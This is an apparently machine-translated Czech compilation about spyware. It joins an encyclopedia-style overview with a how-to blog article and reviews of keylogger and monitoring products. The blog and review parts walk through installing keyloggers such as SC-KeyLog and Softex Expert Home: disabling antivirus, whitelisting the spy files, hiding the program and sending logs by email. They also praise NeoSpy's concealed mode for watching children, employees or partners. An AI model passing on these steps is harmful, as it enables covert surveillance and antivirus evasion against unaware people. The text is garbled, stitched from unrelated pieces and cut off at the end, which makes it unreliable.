Špión software
Spyware (spyware) - program, který je tajně nainstalován na počítači za účelem úplné nebo částečné kontroly nad provozem počítače a uživatelem bez jeho souhlasu.
V současné době existuje mnoho definic a výkladů pojmu spyware. Anti-Spyware Coalition, která zahrnuje mnoho hlavních výrobců antispywarového a antivirového softwaru, jej definuje jako monitorovací software, nainstalován a používán bez řádného upozornění uživatele, jeho souhlasu a kontroly uživatelem, tedy neoprávněná instalace.
Spyware může provádět širokou škálu úkolů, například:
- shromažďovat informace o zvycích používání internetu a nejčastěji navštěvovaných stránkách (sledovací program);
- zapamatovat si stisknuté klávesy na klávesnici (snímky obrazovky (screen scraper) a poté odeslat informace tvůrci spywaru;
- neoprávněné a dálkové ovládání počítače (software pro dálkové ovládání) - zadní vrátka, botnety, droneware;
- nainstalovat další programy do počítače uživatele;
- slouží k neautorizované analýze stavu bezpečnostních systémů (software pro analýzu zabezpečení) - skenery portů a zranitelností a prolomení hesel;
- změna parametrů operačního systému (software modifikující systém) - rootkity, ovládání interceptorů (hijackerů) atd. - výsledkem je snížení rychlosti připojení k internetu nebo ztráta připojení jako takového, otevření dalších domovských stránek popř. odstranění určitých programů;
- přesměrování aktivity prohlížeče, což znamená slepé návštěvy webových stránek s rizikem virů.
Legitimní použití „potenciálně nežádoucí technologie“
Historie a vývoj
Do roku 2006 se Spyware stal jednou z převažujících bezpečnostních hrozeb počítačové systémy pomocí Windows. Počítače, které používají Internet Explorer jako svůj primární prohlížeč, nejsou částečně zranitelné, protože internet Explorer nejpoužívanější, ale vzhledem k tomu, že jeho těsná integrace s Windows umožňuje spywaru přístup ke klíčovým uzlům operačního systému.
Před vydáním aplikace Internet Explorer 7 prohlížeč automaticky zobrazil okno instalace pro jakoukoli komponentu ActiveX, kterou chtěl web nainstalovat. K masivnímu šíření spywaru přispěla kombinace naivní uživatelské neznalosti spywaru a předpokladu Internet Exploreru, že všechny komponenty ActiveX jsou neškodné. Mnoho spywarových komponent také využívá chyby v
Spyware, adware a sledovací software
Termín „adware“ často označuje jakýkoli program, který zobrazuje reklamy s nebo bez souhlasu uživatele. Některé, jako např Eudore zasílat klientovi reklamu jako alternativu k placení registračních účtů. Takové programy jsou klasifikovány jako adware ve smyslu programu podporovaného reklamou, nikoli však jako spyware. Adware nepůsobí skrytě ani neuvádí uživatele v omyl, pouze uživateli nabízí doplňkové služby.
Mnoho adware je spywarem z jiných důvodů: zobrazují spořiče obrazovky s reklamami na základě výsledků aktivity spywaru ve vašem počítači. Příklady: Software Gator od společnosti Claria Corporation and Přesná reklama od BargainBuddy. Navštívené webové stránky se mohou instalovat Gator na klientských počítačích tajným způsobem, čímž se příjmy ze zobrazování více vyskakovacích oken přesměrují na místo instalace a do společnosti Claria Corporation.
Jiné chování spywaru, jako je hlášení webů navštívených uživatelem, probíhá na pozadí. Data se používají pro cílený reklamní efekt.
Rozšířené používání spywaru vrhá podezření na další programy, které sledují návštěvy webových stránek pro výzkumné a statistické účely. Několik recenzentů popisuje Alexa Toolbar, plugin Ad-Aware, který to podporuje.
Spyware a adware jsou podobné virům v tom, že jsou svou povahou škodlivé.
Stejně tak programy dodávané s svobodný software s reklamní podporou jsou spyware (odinstalace odstraní pouze nadřazený program), nicméně uživatelé si je stahují dobrovolně. To představuje dilema pro tvůrce anti-spywaru, jejichž nástroje pro odinstalaci mohou nenávratně učinit požadované programy nepoužitelnými. Například nedávné výsledky testů ukázaly, že kompletní program KdyžUložit skenery ignorovány), protože je součástí oblíbeného klienta eDonkey. Aby se tento problém vyřešil, Anti-Spyware Coalition pracuje na vytvoření konsenzu v rámci antispywarového průmyslu, pokud jde o přijatelné chování programu.
Spyware, viry a síťoví červi
Telefonní podvod
Tvůrci spywaru mohou podvádět telefonní linky pomocí programů jako "dialer". Vytáčení může resetovat modem, aby bylo vytáčení drahé telefonní čísla místo obvyklého ISP. Tato nedůvěryhodná čísla jsou spojena za mezinárodní nebo mezikontinentální sazby, což má za následek neúměrné telefonní účty. Dialer je neúčinný na počítačích bez modemu nebo bez připojení k telefonní lince.
Digitální ochrana autorských práv
Některé technologie ochrany proti kopírování jsou spyware. V roce 2005 bylo zjištěno, že společnost Sony BMG Music Entertainment používá ve své technologii ochrany proti kopírování XCP rootkity. Stejně jako Spyware bylo nejen obtížné je odhalit a odinstalovat, ale byly tak špatně napsané, že většina pokusů o jejich odstranění by způsobila selhání počítače.
Počínaje 25. dubnem 2006, přihláška od Oznámení Windows Genuine Advantage(počítače jako "kritická aktualizace zabezpečení." kopie oken koupil a nainstaloval legálně do počítače, nainstaloval také program, který byl obviňován z každodenního „volání domů“ jako spyware. Tuto aplikaci lze odstranit pomocí Odebrat WGA.
Osobní vztahy
Spyware se používá ke skrytému sledování elektronické aktivity partnerů v intimních vztazích, obvykle k odhalování případů nevěry. Alespoň jeden ze softwarových balíků Zamilovaný byl speciálně navržen pro tyto účely.
Spyware a soubory cookie
Nějaké vzorky
Tyto běžné spyware vykazují různé chování. Všimněte si, že stejně jako viry dali výzkumníci spywaru názvy, které se mohou lišit od těch, které vymysleli jejich tvůrci. Spyware lze seskupit do rodin založených nikoli na společném programovacím kódu, ale na podobném chování. Například řada distribuovaných programů Společnost Claria Corporation jsou souhrnně známé jako Gator... Podobně programy, které se často instalují společně, lze popsat jako součást jednoho balíčku spywaru, i když fungují samostatně.
- včetně webových stránek coolwebsearch.com... Vytváří vyskakovací reklamy, přepisuje výsledky vyhledávání a upravuje infikované hostitelské soubory pro přesměrování webových stránek.
- HuntBar také WinTools nebo Adware.Websearch... Instaluje se ve spojení se stahováním ActiveX z partnerských stránek nebo prostřednictvím vyskakovacích oken poskytovaných jiným spywarem (příklad toho, jak jeden spyware může nainstalovat ještě více spywaru). Tyto programy přidávají do aplikace Internet Explorer panely nástrojů, sledují zvyky při procházení webových stránek, přesměrovávají přidružené odkazy a vyskakovací reklamy.
- Movieland, popř Moviepass.tv nebo Popcorn.net- služba stahování videa, která byla předmětem tisíců stížností na neustálé otravné zobrazování vyskakovacích oken a žádostí o platbu. FTC sestavil soubor stížností proti společnosti Movieland a 11 dalším obžalovaným obviněným z vytvoření národního schématu pro použití podvodu a nátlaku k vybírání plateb od zákazníků. Obžaloba tvrdila, že program „opakovaně otevírá nepřiměřená reklamní okna, která nelze zavřít nebo minimalizovat, doprovázená přehráváním hudby po dobu asi 1 minuty, a vyžaduje platbu ve výši 29,95 $ za zastavení vyskakovacích oken, což také vyžaduje, aby zákazníci, Ti, kteří se zaregistrovali na třídenní bezplatnou zkušební verzi, ale neměli čas zrušit své členství před vypršením zkušebního období, které bylo také zaplaceno.“
- Zango (dříve 180 řešení). Zasílá inzerentům podrobné informace o webových stránkách navštívených uživatelem. Také se mění webové stránky affiliate inzerentů, které zase poskytují příležitost pro nepoctivé příjmy 180 řešení... Otevírá vyskakovací okna, která překrývají webové stránky konkurenčních společností.
- Trojan.Zlob nebo jednoduše Zlob. Stáhne se do vašeho počítače prostřednictvím kodeku ActiveX a na server hlásí informace, jako je historie vyhledávání, navštívené webové stránky a dokonce i stisknuté klávesy. Nedávno bylo odhaleno, že Zlob je schopen přepsat instalace routeru.
Na rozdíl od tvrzení spotřebitelů výrobci spywaru tvrdí, že uživatelé ve skutečnosti s instalací souhlasí. Spyware spojený s distribucí může být označován v obchodním jazyce uživatelská smlouva EULA. Mnoho lidí obvykle ignoruje čtení a pochopení významu tohoto dokumentu a jednoduše klikne na tlačítko „Souhlasím“. K dnešnímu dni soudní systém nerozhodl, zda jsou inzerenti odpovědní za to, že spyware zobrazuje jejich reklamy. V mnoha případech společnosti, jejichž produkty se objevily v reklamách iniciovaných Spywarem, neobchodují přímo s výrobcem Spywaru. Spíše uzavírají smlouvu s reklamní agenturou, která zase uzavírá smlouvy s třetí stranou, která je placena za počet „vyskakovacích oken“. Některé přední společnosti, jako je Dell Computer,
Metody léčby a prevence
Pokud se hrozba ze spywaru stane více než rušivou, existuje řada metod, jak se s ní vypořádat. To zahrnuje programy určené k odstranění nebo zablokování zavádění spywaru, stejně jako různé uživatelské tipy ke snížení pravděpodobnosti, že se spyware dostane do systému.
Spyware však zůstává nákladným problémem. Pokud OS infikuje významný počet spywarových prvků, jedinou možností je uložit datové soubory uživatele a kompletně přeinstalovat OS.
Antispywarové programy
Programy jako Windows XP a Windows Server 2003. V roce 2006 Microsoft přejmenoval beta verzi Windows Defender, která je zdarma ke stažení (pro registrované uživatele) od října 2006 a je součástí standardního nástroje Windows Vista.
Některé další produkty proti spywaru:
|
Mnoho antivirových firem (jako McAfee a Sophos) později dospělo k rozhodnutí přidat do stávajících antivirových produktů funkcionalitu proti spywaru. Brzy mnozí vyjádřili svou neochotu přidat anti-spyware a citovali žaloby autorů Spyware na vlastníky webových stránek a programů popisujících jejich produkt jako Spyware. Nicméně nejnovější verze antivirové produkty pro domácnosti a firmy od těchto předních společností stále zahrnují anti-spyware, i když se přístup liší od přístupu k virům: např. Antivirové přístupové skenery fungují podobným způsobem.
Rané verze anti-spywaru byly zaměřeny hlavně na jejich nalezení a odstranění. SpywareBlaster od Javacool Software byl jedním z prvních, který nabízel ochranu v reálném čase a blokoval instalaci spywarů založených na ActiveX a dalších.
Stejně jako antivirové programy i antispyware vyžaduje pravidelné aktualizace databáze. Jakmile jsou vydány nové vzorky spywaru, vývojáři antispywaru je detekují a vyhodnocují a vytvářejí signatury, které umožňují programu najít a odstranit hrozbu. Anti-spyware má tedy jen malý užitek bez zdroje pravidelných aktualizací. Někteří výrobci poskytují služby aktualizace po registraci, zatímco jiní umožňují bezplatné aktualizace. Aktualizace lze instalovat automaticky podle plánu, před skenováním nebo ručně.
Pokud Spyware nebyl zablokován a podařilo se jej nainstalovat, bude odolávat pokusům o zastavení spouštění nebo odinstalaci. Některé Spyware fungují ve dvojicích: když antispywarový skener nebo uživatel přeruší jeden běžící proces, druhý oživí zabitý program. Podobně některé Spyware detekuje pokus o smazání klíčů registru a okamžitě je znovu přidá. Obvykle se infikovaný OS spustí v bezpečný režim Umožňuje anti-spywaru s větší pravděpodobností odstranit tvrdohlavý spyware.
Spyware nové generace ( dobrý příklad je Look2Me z NicTechNetworks) je spuštěn a skrývá se mezi kritickými systémové procesy a běží i v nouzovém režimu. Pokud neexistuje žádný proces, který lze bezbolestně přerušit, je mnohem obtížnější odhalit a odstranit spyware. Někdy dokonce na disku nezanechají žádnou známku své existence.
Novější Spyware má speciální protiopatření proti známým antivirovým programům a může jim zabránit ve spuštění, instalaci nebo dokonce odinstalaci. Příkladem spywaru využívajícího všechny tři metody je Gromozon... Aby zůstal neviditelný, používá proměnný datový tok. Vestavěný rootkit to skryje i před vícevláknovými skenery a aktivně brání spuštění známých skenerů rootkitů.
Falešný anti-spyware
Škodliví programátoři uvolňují značné množství falešného anti-spywaru a rozšířená vyskakovací okna vás varují, „jak jsou vaše počítače infikované“ nabídkou, že si zakoupíte produkty pro odstranění spywaru (které to neudělají a v nejhorším případě mohou přidat ještě více spywaru). například, Titanový štít) často instalují trojského koně ke stažení zkušební verze.
Hlavním cílem výrobců těchto produktů je prodat svůj produkt. Může se objevit opakovaně dialogová okna ze systému Windows se zprávou: "VAROVÁNÍ! Váš počítač je infikován spywarem! Chcete-li jej odstranit, kupte ... (název programu)!" Obvykle kliknutím na tlačítko OK v dialogovém okně přesměrujete prohlížeč na porno stránku. Někdy i stisknutí horního tlačítka X pro zavření okna může mít stejný účinek nebo dokonce aktivovat instalaci. Stisknutím Alt + F4 lze tento trik obejít. Některé programy jako SpyAxe automaticky stáhnout zkušební verzi bez jakéhokoli zásahu uživatele.
Často se objevují zprávy o výsledcích „skenování“ a počtu nalezených hrozeb, které by měly uživatele přesvědčit o nutnosti instalace tohoto programu.
Téměř všechny známé anti-spyware zjišťují přítomnost falešných programů, které již byly ve vašem systému nainstalovány. Ty, které jsou instalovány pomocí trojského koně, je mnoho anti-spywaru schopno „zdržet“ ještě před pokusem o nasazení. Odstranění agresivního falešného antispywaru nové generace však často vyžaduje použití nástrojů, jako je HijackThis, v kombinaci s technikami ručního odstraňování, protože může nějakou dobu trvat, než výrobci antispywaru prozkoumají nové hrozby, které se objevují, a automatizují proces detekce a jejich odstranění. Při použití HijackThis bez pomoci počítačového technika však může dojít k náhodnému smazání potřebných. Komponenty Windows, což může vést k selhání systému jako celku. Proto se doporučuje uchýlit se k pomoci konzultantů na tematických fórech.
Šíření falešných nebo klamavých antivirových produktů vyvolalo vážné obavy. Takové produkty se často vydávají za anti-spyware, antivirus nebo čističe registru a někdy vyskakovací okna s návrhem instalace.
Někteří významní představitelé:
|
|
Někdy je důležité vědět, co se děje s počítačem ve vaší nepřítomnosti. Kdo a co na něm dělá, které weby a programy zahrnují. To vše může hlásit speciální spyware.
Špehovat někoho není přinejmenším dobré. A i to je zcela trestně postižitelné (porušení práva na mlčenlivost a vše ostatní)... Někdy však neuškodí vědět, co například dělá vaše dítě u počítače ve vaší nepřítomnosti nebo co zaměstnanci spol. vaše organizace dělá, když není šéf. Nebo vás možná sledují?!!
Počítač a mobilní zařízení byli dlouho vystaveni nebezpečí nejrůznějších virů. Existuje však třída softwaru, který, i když není škodlivý, může vykonávat stejné funkce jako například trojské koně – uchovávat protokol spouštění aplikací v systému, zaznamenávat všechny stisknuté klávesy na klávesnici, pravidelně pořizovat snímky obrazovky a poté odeslat všechny shromážděné informace tomu, kdo nainstaloval a nakonfiguroval sledování uživatelů.
Jak jste pochopili, dnes se zaměříme konkrétně na spyware, jejich práci a způsoby detekce.
Rozdíly od virů
V oblasti antivirových řešení je třída spywaru známá jako „spyware“ (z anglického „spy“ – „špion“ a zkráceně „software“ – „software“). V zásadě některé aplikace, o kterých bude řeč níže, jsou antiviry vnímány jako škodlivé, ve skutečnosti nejsou.
Jaký je rozdíl mezi skutečným spywarem a počítačovým spywarem? Hlavní rozdíl je zde v rozsahu a způsobu práce. Spyware viry se do systému instalují bez vědomí uživatele a mohou sloužit jako zdroj dalších hrozeb (např. krádež a poškození dat).
Spyware pro spyware si uživatel instaluje sám, aby zjistil, co druhý uživatel na PC dělá. V tomto případě si uživatel sám může být vědom toho, že je sledován (např. v některých institucích se tak děje za účelem sledování pracovní doby zaměstnanců).
Z hlediska principu fungování se však spyware v podstatě neliší od všemožných trojských koní, keyloggerů nebo backdoorů...krádejících informace z PC, jak moc ovládat jeho práci.
Mimochodem, na Západě je praxe zavádění sledovacího softwaru na počítačích uživatelů firemní sítě a je poměrně běžný na domácích počítačích. Pro takové programy dokonce existuje samostatný název – „sledovací software“, který je umožňuje, alespoň nominálně, oddělit od škodlivého spywaru.
Keyloggery
Nejrozšířenějším a do jisté míry i nebezpečným typem spywaru jsou keyloggery (z anglického „key“ – „tlačítko“ a „logger“ – „recorder“). Navíc tyto programy mohou být jak nezávislé viry zavedené do systému, tak speciálně nainstalované sledovací nástroje. Není mezi nimi v podstatě žádný rozdíl.
Keyloggery jsou navrženy tak, aby registrovaly všechny úhozy na klávesnici (někdy i myši) a ukládaly data do souboru. V závislosti na principu činnosti každého konkrétního keyloggeru lze soubor jednoduše uložit na místní pevný disk nebo pravidelně odesílat osobě, která je sleduje.
Bez jakéhokoli podezření tak můžeme všechna naše hesla „předat“ třetím stranám, které je mohou použít k jakémukoli účelu. Útočník se například může nabourat do našeho účtu, změnit přístupová hesla a/nebo je někomu přeprodat...
Naštěstí většina keyloggerů rychle najde směr pomocí většiny antivirů, protože provádějí podezřelé zachycení dat. Pokud však keylogger nainstaloval správce, pak bude s největší pravděpodobností zahrnut do výjimek a nebude detekován ...
SC-KeyLog je ukázkovým příkladem bezplatného keyloggeru:
Tento keylogger, bohužel, je detekován antivirem ve fázi bootování. Pokud se tedy rozhodnete ji nainstalovat, dočasně vypněte ochranu, dokud ji nepřidáte požadované soubory do "whitelistu":
- spustitelný soubor programy (ve výchozím nastavení: C: \ Program Files \ Soft-Central \ SC-KeyLog \ SC-KeyLog2.exe);
- spustitelný soubor modulu sledování, který si vytvoříte v určené složce;
- knihovnu (soubor DLL) pro skryté zpracování dat, jejíž název rovněž určíte ve fázi nastavení a která je standardně uložena ve složce C: \ Windows \ System32 \.
Po instalaci budete přesměrováni do průvodce nastavením. Zde můžete zadat e-mailovou adresu, na kterou se mají datové soubory zasílat, název a umístění výše zmíněných spustitelných modulů pro zachycení stisku kláves a také heslo potřebné k otevření protokolů.
Po provedení všech nastavení a zařazení souborů keyloggeru do seznamu důvěryhodných antivirových programů je vše připraveno k práci. Zde je příklad toho, co můžete vidět v souboru protokolu:
Jak vidíte, SC-KeyLog zobrazuje názvy všech oken, se kterými uživatel pracuje, klikání na tlačítka myši a vlastně i klávesnici (včetně servisních kláves). Je třeba poznamenat, že program neví, jak určit rozvržení a zobrazuje všechny texty anglickými písmeny, které je třeba ještě převést do čitelné ruskojazyčné podoby (například).
Funkce keyloggeru však lze skrýt i v oblíbeném nespecializovaném softwaru. Pozoruhodným příkladem je program pro změnu rozložení textu Punto Switcher:
Jeden z doplňkové funkce tohoto programu je "Deník", který se aktivuje ručně a ve skutečnosti je to skutečný keylogger, který zachycuje a pamatuje si všechna data zadaná z klávesnice. Text je přitom uložen v požadovaném rozložení a chybí pouze zachycení dění myši a mačkání speciálních kláves na klávesnici.
Plus Přepínač Punto jako keylogger v tom, že není sledován antivirem a je nainstalován na mnoha počítačích. V souladu s tím můžete v případě potřeby aktivovat sledování bez instalace jakéhokoli softwaru a dalších vylepšení!
Složití špióni
Keylogger je dobrý, pokud potřebujete vědět, co uživatel zadává z klávesnice a jaké programy zároveň spouští. Tato data však nemusí stačit. Proto složitější softwarové balíčky pro komplexní špionáž. Takové špionážní komplexy mohou zahrnovat:
- keylogger;
- zachycovač schránky;
- špión obrazovky (pořizuje snímky obrazovky v určených intervalech);
- spouštění programu a záznamník aktivit;
- systém pro záznam zvuku a videa (s mikrofonem nebo webovou kamerou).
Abyste si mohli lépe představit, jak takové programy fungují, zvažte pár bezplatná řešení tímto směrem. A první z nich bude bezplatný sledovací systém v ruštině s názvem (pozor, antiviry a prohlížeče mohou blokovat přístup na stránku!):
Mezi funkce programu patří:
- zachycení úhozů na klávesnici;
- pořizování snímků obrazovky (ve výchozím nastavení příliš často);
- sledování spuštěné programy a dobu jejich činnosti;
- sledování aktivity PC a uživatelského účtu.
Bohužel, tento komplex pro monitorování PC je také sledován antiviry, proto jej musíte stáhnout a nainstalovat, musíte nejprve zakázat ochranu. Při instalaci musíme nastavit klávesovou zkratku pro vyvolání rozhraní programu a také heslo pro přístup k nasbíraným datům.Po dokončení instalace přidejte celou spy složku na antivirový „white list“ (ve výchozím nastavení C: \ Dokumenty a nastavení \ Všichni uživatelé \ Data aplikací \ Softex) a můžete ochranu aktivovat zpět.
Softex Expert Home poběží na pozadí a nikde nevytváří žádné zástupce ani aktivní ikony. Jeho činnost bude možné zjistit pouze stisknutím kombinace horkých kláves, kterou jste zadali. V zobrazeném okně zadejte přístupové heslo, nejprve přejděte do sekce "Nastavení" na kartě "Snímky obrazovky" a zvyšte minimální interval mezi snímky a interval časovače (ve výchozím nastavení 2 a 10 sekund, resp. ).
Takový špión je docela dost pro sledování vašeho domácího počítače. Kromě již výše zmíněných funkcí má Expert Home funkci pro vzdálené prohlížení statistik, která umožňuje prohlížet protokoly přes internet. Chcete-li jej aktivovat, stačí kliknout na tlačítko pro připojení k serveru v sekci „Monitorování internetu“ a poté počkat na vydání ID počítače a přístupového hesla, které bude nutné zadat na webu vývojáře:
Stojí za to objasnit, že ve volném režimu provozu jsou statistiky uloženy na serveru pouze jeden den. Pokud chcete získat přístup k delšímu období, budete muset zaplatit od 250 (7 dní) do 1 000 (30 dní) rublů měsíčně.
Další bezplatný kompletní program pro monitorování počítače je:
Navzdory tomu, že název programu obsahuje slovo „keylogger“, ve skutečnosti je v něm mnohem více možností. Mezi nimi:
Samotný program není antivirem detekován, ale s aktivními heuristickými algoritmy je sledována jeho "podezřelá" aktivita. Proto je nejlepší nainstalovat a nakonfigurovat jej s vypnutou ochranou.
Ve fázi instalace není nutná předběžná příprava (jediná věc, která je potřeba, je vybrat, pro koho je program nainstalován a zda chcete zobrazit jeho ikonu na liště). Po instalaci je však potřeba přidat složku programu (standardně C: \ WINDOWS \ system32 \ Mpk) a její spustitelný soubor MPKView.exe do antivirových výjimek.
Při prvním spuštění se otevře okno nastavení. Zde můžeme změnit jazyk z angličtiny například na ukrajinštinu (z nějakého důvodu zde není ruština ...), nastavit vlastní klávesové zkratky programu (standardně ALT + CTRL + SHIFT + K) a heslo pro vstup do ovládacího panelu.
To je ve skutečnosti vše. Hlavní nevýhoda bezplatná verze program je omezen v některých aspektech sledování (například ne všechny programy jsou dostupné), stejně jako chybí možnost posílat protokoly poštou nebo přes FTP. Jinak je skoro vše v pořádku.
Spyware existuje nejen pro stolní počítače, ale také pro mobilní platformy... Pokud chcete vědět, co vaše dítě dělá na tabletu nebo chytrém telefonu, můžete zkusit použít bezplatný multiplatformní sledovací systém KidLogger.
Čichači
Posledním a nejzákeřnějším prostředkem špionáže mohou být tzv. sniffery (z anglického „sniff“ – „vyčmuchat“). Tato třída programů se vědecky nazývá „analyzátory provozu“ a používá se k zachycení a analýze dat přenášených přes internet.
Pomocí snifferu se může útočník připojit k aktuální webové relaci uživatele a použít ji pro vlastní účely jménem samotného uživatele falšováním datových paketů. Máte-li velkou smůlu, pak vám pomocí snifferu mohou být „sebrány“ vaše přihlašovací jména a hesla pro vstup na jakékoli stránky, kde se nepoužívá šifrování provozu.
Ti, kteří používají konkrétní veřejnou síť pro přístup k internetu (například tečka Wi-Fi připojení). Teoreticky mohou být ohroženi také uživatelé podnikových sítí s příliš „podnikavým“ správcem.
Abyste získali přibližnou představu o tom, co je sniffer, navrhuji zvážit v osobě zástupce této třídy programů vývoj populárního týmu NirSoft:
Tento sniffer je určen hlavně pro zachycování datových paketů na lokálním PC a slouží spíše pro dobré úmysly (např. ladění sítě). Jeho podstata je ale stejná jako u hackerských nástrojů.
Osoba, která rozumí principům přenosu dat přes síťové protokoly a rozumí tomu, jaké informace jsou přenášeny v konkrétním paketu, může dešifrovat jeho obsah a v případě potřeby jej nahradit odesláním upraveného požadavku na server. Pokud připojení prochází jednoduchým HTTP kanálem bez šifrování, pak hacker uvidí vaše hesla přímo v okně sniffer, aniž by musel cokoliv dekódovat!
Problém zhoršuje skutečnost, že dříve existovaly sniffery pouze pro stacionární operační systémy. Dnes existuje například řada snifferů pro Android. Útočník analyzující provoz tedy může být prakticky kdekoli (i u vedlejšího stolu v kavárně s bezplatným Wi-Fi! Pozoruhodným příkladem snifferu pro Android je mobilní verze populární sniffer WireShark:
S pomocí tohoto snifferu a programu pro analýzu protokolů Shark Reader může útočník zachytit data přímo ze smartphonu nebo tabletu připojeného k veřejnému přístupovému bodu.
Anti-spyware
Tak jsme se dozvěděli, jak fungují hlavní typy spywaru. A existuje legitimní otázka: „Jak se ale můžete chránit před sledováním sami?“ ... Toto je úkol z kategorie „obtížný, ale možný“.
Jak vidíte, téměř všechny špionážní programy jsou sledovány antiviry. Prvním krokem je tedy aktualizace antivirových databází a nainstalovaného antivirového softwaru. Kromě toho nezapomeňte otevřít „bílou listinu“ vašeho antivirového balíčku a zjistit, zda je povoleno pracovat se soubory s podezřelými názvy umístěnými v systémových složkách.
Pokud používáte výše zmíněný Punto Switcher (nebo jeho obdoby), nezapomeňte zkontrolovat, zda někdo nezapnul „Deník“ bez vašeho vědomí.
Pokud nejsou v nastavení antiviru ani v Punto Switcher nalezeny žádné podezřelé parametry, můžete se uchýlit ke skenování systému pomocí speciálních antivirových skenerů. Doporučuji používat programy, které mám osobně vyzkoušené a.
Kromě toho můžete zkontrolovat ty, kteří pracují tento moment procesy pomocí speciálních antivirových správců úloh. Příkladem toho je bezplatný nástroj. Tento nástroj umožňuje nejen vidět názvy a adresy všech běžících procesů, ale také rychle posoudit míru jejich škodlivosti (byť potenciální).
Nejtěžší je čelit čichačům. Pokud nemůžete zcela opustit používání veřejných sítí, pak jediným typem ochrany může být použití stránek, které podporují šifrovaný protokol přenosu dat HTTPS (nyní jej má většina sociálních sítí). Pokud web nebo služba, kterou potřebujete, nepodporuje šifrování, můžete jako poslední možnost zorganizovat tunel pro bezpečný přenos dat pomocí VPN.
závěry
Jak vidíte, není tak obtížné nainstalovat a zavést sledování na jakémkoli počítači. Navíc to lze provést zcela zdarma pomocí malých programů. Pokud tedy používáte veřejné sítě nebo pracujete na PC, které používá více uživatelů, pak teoreticky existuje šance, že jste již sledováni.
Přílišná neopatrnost a důvěřivost vás může stát minimálně ztrátu hesel k účtům na sociálních sítích a v nejhorších případech například krádeže peněz z vašich elektronických účtů. Proto je důležité řídit se zásadou „důvěřuj, ale prověřuj“.
Pokud se sami rozhodnete nainstalovat sledování na něčí počítač, musíte na to uživatele upřímně upozornit. Jinak si v případě odhalení špionáže můžete vydělat spoustu problémů na hlavu :) Proto si před špehováním dobře rozmyslete!
P.S. Tento článek je dovoleno volně kopírovat a citovat za předpokladu, že je uveden otevřený aktivní odkaz na zdroj a je zachováno autorství Ruslana Tertyshnyho.
Jak víte, co vaše dítě nebo zaměstnanec dělá na počítači? Jaké stránky navštěvuje, s kým komunikuje, co a komu píše?
K tomu slouží spyware – speciální typ softwaru, který pro uživatele nepostřehnutelně shromažďuje informace o všech jeho akcích. Spyware pro váš počítač bude stačit.
Spyware pro počítač by se neměl zaměňovat s trojským koněm: první je zcela legitimní a instaluje se se souhlasem správce, druhý se do PC dostane nelegálně a provádí skrytou škodlivou činnost.
Kyberzločinci však mohou také používat legitimní sledovací programy.
Špionážní aplikace si nejčastěji instalují obchodní vedoucí a správci systému, aby sledovali zaměstnance, rodiče, aby špehovali děti, žárlivé manžele atd. Zároveň „oběť“ může vědět, že je sledována, ale častěji než ne, on ne.
Recenze a srovnání pěti populárních spywarů
NeoSpy
NeoSpy je všestranný spyware pro činnost klávesnice, obrazovky a uživatele. NeoSpy funguje neviditelně a během instalace může skrýt svou přítomnost.
Uživatel, který program instaluje, má možnost vybrat si jeden ze dvou režimů instalace – administrátorský a skrytý. V prvním režimu se program otevře - vytvoří zástupce na ploše a složku v adresáři Program Files, ve druhém se skryje.
Procesy programu se ve správci nezobrazují Úkoly systému Windows a správci úloh třetích stran.
Funkčnost NeoSpy je poměrně široká a program lze použít jak jako domácí sledování, tak v kancelářích pro kontrolu zaměstnanců.
Spyware je distribuován ve třech verzích pod sharewarovou licencí. Cena je 820-1990 rublů, ale může fungovat zdarma (i v skrytý režim) s omezeními při prohlížení přehledů.
Co NeoSpy umí:
- monitorovat klávesnici;
- sledovat návštěvy webových stránek;
- zobrazit obrazovku uživatele v reálném čase přes internet z jiného počítače nebo z tabletu;
- pořizovat snímky obrazovky a ukládat snímky z webové kamery;
- monitorovat systémové události (zapnutí, vypnutí, výpadek počítače, připojení vyměnitelných médií);
- zachytit obsah schránky;
- Monitorujte používání internetových messengerů, nahrávejte hovory Skype;
- zachytit data odeslaná pro tisk a zkopírovaná na externí média;
- vést statistiku práce na počítači;
- odeslat souřadnice notebooku (vypočítané přes Wi-Fi).
Díky ruskojazyčnému rozhraní, široké škále funkcí, správnému zachycení klávesnice a zcela skrytému provoznímu režimu v systému získává NeoSpy při výběru maximální hodnocení programy pro uživatelské ovládání.
Skutečný špionážní monitor
Dalším špionem je Real Spy Monitor. Tento program v anglickém jazyce má nejen funkce sledování, ale může také blokovat určité akce v počítači. Proto se často používá jako nástroj rodičovské kontroly.
Pro každého účet v nastavení Real Spy Monitor si můžete vytvořit vlastní politiku zákazu, například pro návštěvu určitých stránek.
Bohužel kvůli absenci rozhraní v angličtině je obtížnější pochopit, jak Real Spy Monitor funguje, a to i přes grafické miniatury tlačítek.
Program je také placený. Licence začíná na 39,95 $.
Funkce Real Spy Monitor:
- zachycení stisku kláves, obsahu schránky, systémových událostí, webových stránek, instant messengerů, pošty;
- pracovat v poloskrytém režimu (bez aktivního okna, ale se zobrazením procesu ve správci úloh);
- pracovat s více účty;
- selektivní autostart pro různé účty.
Obecně se Real Spy Monitor líbí mnoha uživatelům, mezi nedostatky, které zaznamenali vysoká cena, absence rozhraní v ruštině a zobrazení procesu ve správci úloh.
Skutečný špión
Actual Spy je vývojáři umístěn jako keylogger ( keylogger), ačkoli program umí více než jen zaznamenat stisknuté klávesy.
Ovládá obsah schránky, pořizuje snímky obrazovky, sleduje návštěvy stránek atd., což je součást hlavní sady spywaru, kterou jsme recenzovali.
Po instalaci vytvoří Actual Spy zástupce v nabídce Start, takže si toho může uživatel všimnout. Spuštění také probíhá otevřeně - pro skrytí okna programu musíte stisknout určité klávesy.
Možnosti Actual Spy se příliš neliší od těch konkurentů. Mezi nedostatky uživatelé poznamenali, že správně zaznamenává úhozy pouze v anglickém rozložení.
SpyGo
SpyGo je špionážní sada pro domácí použití. Může být také použit v kancelářích pro sledování zaměstnanců.
Chcete-li zahájit monitorování, stačí stisknout tlačítko "Start" ve SpyGo.
SpyGo je distribuován pod sharewarovou licencí a stojí 990-2990 rublů v závislosti na sadě funkcí.
PROTI zkušební verze doba sledování je omezena na 20 minut denně a odesílání zpráv na e-mail a FTP není k dispozici.
Klíčové vlastnosti SpyGo:
- monitorování úhozů;
- záznam všech akcí na počítači (spouštění programů, operace se soubory atd.);
- kontrola návštěv webových zdrojů (historie, vyhledávací dotazy, často navštěvované stránky, délka pobytu na stránce);
- záznam toho, co se děje na obrazovce;
- uložení obsahu schránky;
- poslech prostředí (pokud je k dispozici mikrofon);
- sledování systémových událostí (doba zapnutí a vypnutí počítače, prostoje, připojení flash disků, disků atd.).
Důležité! Mezi nevýhody SpyGo podle uživatelů patří skutečnost, že nepodporuje všechny Verze Windows, při odesílání reportů často hází chyby a jde celkem snadno demaskovat.
Práskač
